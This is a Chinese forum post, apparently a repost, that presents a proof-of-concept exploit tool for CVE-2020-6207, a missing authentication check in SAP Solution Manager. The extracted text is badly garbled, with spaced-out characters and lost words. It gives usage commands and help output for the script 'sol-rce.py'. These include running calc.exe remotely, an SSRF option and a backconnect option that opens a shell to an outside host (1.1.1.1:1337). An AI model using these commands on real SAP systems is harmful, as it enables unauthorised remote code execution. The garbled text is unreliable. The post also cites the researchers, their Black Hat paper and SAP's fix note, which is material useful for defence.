搜索

[28739] 2021-01-27_CVE-2020-6207的PoC(SAP解决方案管理器中缺少身份验证检查)

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2021-01-27_CVE-2020-6207的PoC(SAP解决方案管理器中缺少身份验证检查) C V E - 2 0 2 0 - 6 2 0 7 P o C S A P O t s   2 0 2 1 - 0 1 - 2 7 P o C   C V E - 2 0 2 0 - 6 2 0 7   S A P S A P   E E M   s e r v l e t S A P S A P   S M D A g e n t s   R C E · P a b l o   A r t u s o Y v a n ' i g g y G S A P 2 8 9 0 2 1 3 T w i t t e r @   c h i p i k 使 使 R C E B a c k C o n n e c t S S R F t c ~ s m d ~ a g e n t ~ a p p l i c a t i o n ~ e e m h t t p s : / / i . b l a c k h a t . c o m / U S A - 2 0 / W e d n e s d a y / u s - 2 0 - A r t u s o - A n - U n a u t h e n t i c a t e d - J o u r n e y - T o - R o o t - P w n i n g - Y o u r - C o m p a n y s - E n t e r p r i s e - S o f t w a r e - S e r v e r s - w p . p d f J u s t   p o i n t   S A P   S o l u t i o n   M a n a g e r   h o s t n m a e / i p .   p y t h o n   s o l - r c e . p y   - H   1 7 2 . 1 6 . 3 0 . 4 3   - P   5 0 0 0 0   - c V u l n e r a b l e !   [ C V E - 2 0 2 0 - 6 2 0 7 ]   -   h t t p : / / 1 7 2 . 1 6 . 3 0 . 4 3 : 5 0 0 0 0   p y t h o n   s o l - r c e . p y   - H   1 7 2 . 1 6 . 3 0 . 4 3   - P   5 0 0 0 0   - - r c e   c a l c . e x e   p y t h o n   s o l - r c e . p y   - H   1 7 2 . 1 6 . 3 0 . 4 3   - P   5 0 0 0 0   - - b a c k   1 . 1 . 1 . 1 : 1 3 3 7   p y t h o n   s o l - r c e . p y   - H   1 7 2 . 1 6 . 3 0 . 4 3   - P   5 0 0 0 0   - - s s r f   h t t p : / / 1 . 1 . 1 . 1 / c h p k   p y t h o n   s o l - r c e . p y   - h u s a g e :   s o l - r c e . p y   [ - h ]   [ - H   H O S T ]   [ - P   P O R T ]   [ - p   P R O X Y ]   [ - s ]   [ - c ]   [ - d   V I C T I M ]                                     [ - - s s r f   S S R F ]   [ - - r c e   R C E ]   [ - - b a c k   B A C K ]   [ - - s e t u p   S E T U P ]                                     [ - - l i s t ]   [ - - c l e a r ]   [ - t   T I M E O U T ]   [ - v ] P o C   f o r   C V E - 2 0 2 0 - 6 2 0 7 ,   ( M i s s i n g   A u t h e n t i c a t i o n   C h e c k   i n   S A P   S o l u t i o n   M a n a g e r ) T h i s   s c r i p t   a l l o w s   t o   c h e c k   a n d   e x p l o i t   m i s s i n g   a u t h e n t i c a t i o n   c h e c k s   i n   S A P   E E M   s e r v l e t   ( t c ~ s m d ~ a g e n t ~ a p p l i c a t i o n ~ e e m )   t h a t   l e a d   t o   R C E   o n   S A P   S M D A g e n t s   c o n n e c t e d   t o   S A P   S o l u t i o n   M a n a g e r O r i g i n a l   f i n d i n g : -   P a b l o   A r t u s o .   h t t p s : / / t w i t t e r . c o m / l m k a l g
-   Y v a n   ' i g g y '   G   h t t p s : / / t w i t t e r . c o m / _ 1 g g y P a p e r :   h t t p s : / / i . b l a c k h a t . c o m / U S A - 2 0 / W e d n e s d a y / u s - 2 0 - A r t u s o - A n - U n a u t h e n t i c a t e d - J o u r n e y - T o - R o o t - P w n i n g - Y o u r - C o m p a n y s - E n t e r p r i s e - S o f t w a r e - S e r v e r s - w p . p d f S o l u t i o n :   h t t p s : / / l a u n c h p a d . s u p p o r t . s a p . c o m / # / n o t e s / 2 8 9 0 2 1 3 t w i t t e r :   h t t p s : / / t w i t t e r . c o m / _ c h i p i k o p t i o n a l   a r g u m e n t s :     - h ,   - - h e l p                         s h o w   t h i s   h e l p   m e s s a g e   a n d   e x i t     - H   H O S T ,   - - h o s t   H O S T     S A P   S o l u t i o n   M a n a g e r   h o s t ( d e f a u l t :   1 2 7 . 0 . 0 . 1 )     - P   P O R T ,   - - p o r t   P O R T     S A P   S o l u t i o n   M a n a g e r   w e b   p o r t   ( d e f a u l t :   t c p / 5 0 0 0 0 )     - p   P R O X Y ,   - - p r o x y   P R O X Y                                                 U s e   p r o x y   ( e x :   1 2 7 . 0 . 0 . 1 : 8 0 8 0 )     - s ,   - - s s l                           e n a b l e   S S L     - c ,   - - c h e c k                       j u s t   d e t e c t   v u l n e r a b i l i t y     - d   V I C T I M ,   - - v i c t i m   V I C T I M                                                 D A   s e r v e r N a m e     - - s s r f   S S R F                       e x p l o i t   S S R F .   P o i n t   h t t p   a d d r e s s   h e r e .   ( e x a m p l e : h t t p : / / 1 . 1 . 1 . 1 / c h p k )     - - r c e   R C E                           e x p l o i t   R C E     - - b a c k   B A C K                       g e t   b a c k C o n n e c t   f r o m   D A .   ( e x :   1 . 1 . 1 . 1 : 1 3 3 7 )     - - s e t u p   S E T U P                   s e t u p   a   r a n d o m   s e r v e r N a m e   t o   t h e   D A   w i t h   t h e   g i v e n   h o s t N a m e   a n d   i n s t a n c e N a m e .   ( e x a m p l e :   j a v a u p . m s h o m e . n e t , S M D A 9 7 )     - - l i s t                                 G e t   a   l i s t   o f   e x i s t i n g   D A   s e r v e r s     - - c l e a r                               s t o p   a n d   d e l e t e   a l l   P o C S c r i p t < r n d >   s c r i p t s   f r o m   D A   s e r v e r s     - t   T I M E O U T ,   - - t i m e o u t   T I M E O U T                                                 H T T P   c o n n e c t i o n   t i m e o u t   i n   s e c o n d   ( d e f a u l t :   1 0 )     - v ,   - - v e r b o s e                   v e r b o s e   m o d e
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理